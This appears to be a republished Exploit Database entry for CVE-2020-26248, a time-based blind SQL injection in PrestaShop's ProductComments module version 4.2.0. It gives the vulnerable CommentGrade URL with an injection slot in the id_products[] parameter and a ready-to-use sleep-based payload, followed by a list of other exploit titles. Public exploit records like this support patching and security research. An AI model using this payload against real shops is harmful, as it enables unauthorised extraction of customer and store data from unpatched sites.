PrestaShop ProductComments 4.2.0 – ‘id_products’ Time Based Blind SQL Injection

Exploit Database
17 阅读

作者： Frederic ADAM

日期： 2020-12-16
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/49267/

# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
# Date: 2020-12-15
# Exploit Author: Frederic ADAM
# Author contact: contact@fadam.eu
# Vendor Homepage: https://www.prestashop.com
# Software Link: https://github.com/PrestaShop/productcomments
# Version: 4.2.0
# Tested on: Debian 10
# CVE : CVE-2020-26248

http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=[SQL]

Example:
http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a)

last Exploits
PrestaShop ProductComments 4.2.0 – ‘id_products’ Time Based Blind SQL Injection的更多信息

WordPress Plugin Site Import 1.0.1 – Local/Remote File Inclusion：
File Share scriptFile share – SQL Injection：
Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 – Remote Code Execution：
TinyMCE WYSIWYG Editor – Multiple Vulnerabilities：
gleamtech filevista/fileultimate 4.6 – Directory Traversal：
Opsview pre 4.4.1 – Blind SQL Injection：
K-Search – SQL Injection / Cross-Site Scripting：
Netgear WNR1000 – Authentication Bypass：